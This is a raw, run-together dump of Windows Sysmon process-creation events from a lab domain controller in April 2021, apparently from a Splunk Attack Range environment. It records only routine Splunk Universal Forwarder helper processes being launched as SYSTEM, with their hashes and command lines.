AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033871Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:21:18.363{A8622C2F-4BDE-6078-8E06-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033862Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:21:17.696{A8622C2F-4BDD-6078-8D06-00000000AE01}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033853Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:21:17.094{A8622C2F-4BDD-6078-8C06-00000000AE01}564C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033777Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:20:23.082{A8622C2F-4BA7-6078-8B06-00000000AE01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033762Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:20:21.716{A8622C2F-4BA5-6078-8A06-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033752Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:20:21.049{A8622C2F-4BA5-6078-8906-00000000AE01}5080C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033742Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:20:20.383{A8622C2F-4BA4-6078-8806-00000000AE01}5976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033732Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:20:18.355{A8622C2F-4BA2-6078-8706-00000000AE01}5424C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033722Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:20:17.682{A8622C2F-4BA1-6078-8606-00000000AE01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033712Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:20:17.093{A8622C2F-4BA1-6078-8506-00000000AE01}3220C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033581Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:19:23.081{A8622C2F-4B6B-6078-8406-00000000AE01}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033565Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:19:21.655{A8622C2F-4B69-6078-8306-00000000AE01}3320C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033556Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:19:20.989{A8622C2F-4B68-6078-8206-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033546Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:19:20.384{A8622C2F-4B68-6078-8106-00000000AE01}6080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033536Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:19:18.346{A8622C2F-4B66-6078-8006-00000000AE01}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033527Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:19:17.680{A8622C2F-4B65-6078-7F06-00000000AE01}7132C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033516Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:19:17.091{A8622C2F-4B65-6078-7E06-00000000AE01}5816C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033431Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:18:23.083{A8622C2F-4B2F-6078-7D06-00000000AE01}6748C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033418Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:18:21.746{A8622C2F-4B2D-6078-7C06-00000000AE01}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033405Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:18:21.081{A8622C2F-4B2D-6078-7B06-00000000AE01}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033395Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:18:20.371{A8622C2F-4B2C-6078-7A06-00000000AE01}2812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033375Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:18:18.461{A8622C2F-4B2A-6078-7906-00000000AE01}6292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033366Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:18:17.789{A8622C2F-4B29-6078-7806-00000000AE01}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033356Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:18:17.123{A8622C2F-4B29-6078-7706-00000000AE01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033267Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:17:23.075{A8622C2F-4AF3-6078-7606-00000000AE01}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033255Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:17:21.787{A8622C2F-4AF1-6078-7506-00000000AE01}5756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033243Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:17:21.136{A8622C2F-4AF1-6078-7406-00000000AE01}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033234Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:17:20.376{A8622C2F-4AF0-6078-7306-00000000AE01}7084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033221Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:17:18.278{A8622C2F-4AEE-6078-7206-00000000AE01}5764C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033212Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:17:17.616{A8622C2F-4AED-6078-7106-00000000AE01}2072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033202Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:17:17.115{A8622C2F-4AED-6078-7006-00000000AE01}5096C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033107Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:16:23.083{A8622C2F-4AB7-6078-6F06-00000000AE01}6588C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000033093Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:16:21.788{A8622C2F-4AB5-6078-6E06-00000000AE01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 